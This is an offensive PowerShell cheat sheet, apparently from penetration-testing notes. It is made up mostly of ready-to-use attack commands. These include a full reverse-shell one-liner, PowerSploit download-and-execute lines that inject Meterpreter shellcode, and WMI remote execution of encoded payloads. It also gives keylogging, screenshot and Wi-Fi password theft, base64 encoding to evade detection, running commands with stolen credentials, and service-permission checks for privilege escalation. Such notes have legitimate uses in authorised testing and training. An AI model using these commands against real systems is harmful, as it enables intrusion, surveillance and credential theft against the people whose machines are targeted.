Table of Contents

Reverse Shell One liner

$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();



You've got admin credential, and had shell on the target machine.


Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden

$Proc = Get-Process notepad

Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meter-preter/reverse_https -Lhost <ip> -Lport 443 -Verbose

# Or, in memory

IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost -Lport 443 -Force


To remotely connect to another Windows systems and execute the encoded base64 string on a specific port.

Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList "powershell.exe -enc [Base64 encoded string]" -ComputerName [victim IP] -Credential [Username]



IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

Get-Keystrokes -LogPath C:\key.log -CollectionInterval 1

Exfiltration/Out-Minidump.ps1 (dump memory from a process)

Exfiltration/Get-TimedScreenshot.ps1 (take a screen shot of the victims computer)



Pull information from the Power Shell environment, Putty information, recently used commands, shares, environment variables, SNMP info, installed applications, domain information, user information, system information, and wireless information.

powershell -ExecutionPolicy bypass -file Get-Information.ps1


Pull down all of the users' Wi-Fi information and the stored settings, which includes the SSID and password.



Use with powersploit reverse shells. It sets up a listener and can migrate to process when a target connects to it.

python ./StartListner.py [Host IP] 443


Use with power shell commands to encode them to base64 and avoid detection.

echo "IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); InvokeShellcode -Payload windows/meterpreter/reverse_https -Lhost -Lport 443 -Force" > raw.txt

./ps_encoder.py -s raw.txt

Get System Release ID

(Get-Item "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion").GetValue('ReleaseID')

Executing Command as Another User

You have user credential, but cannot connect to the machine with that user. The only thing you have is a service shell.

$pass = ConvertTO-SecureString '<passwd>' -Asplain -Force
$cred = New-Object System.Management.Automation.PSCredential('.\hector', $pass)
invoke-command -Computer <computer-name> -Credential $cred -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('') }

Get User ACL

# user acl on registry
ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights | Foreach-Object {$_.DiscretionaryAcl}

Go into Registry Mode

cd HKLM:

cd SYSTEM\CurrentControlSet\Services

# dump all services

# get all service properties
$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*

# get chile name and count, the objectname can print the service running context, if you can manipulate service, find those running as system
$services | select [PSChildName|ObjectName] | measure

$services | where { ($_.ObjectName -match 'LocalSystem') }

# and find those whose start is 0x03, which means manual
$services | where { ($_.ObjectName -match 'LocalSystem') -and $_.Start -match '3') }

# check the security of service in powershell
cmd \c sc sdshow wuauserv

# then
ConvertFrom-SddlString -Sddl "sddl from last command" | Foreach-Object {$_.DiscretionaryAcl}

# list all services with can be started
foreach ($service in $service-names) { $sddl = (cmd /c sc sdshow $service); if $sddl -match "RP[A-Z]*?;;;AU" { $service }}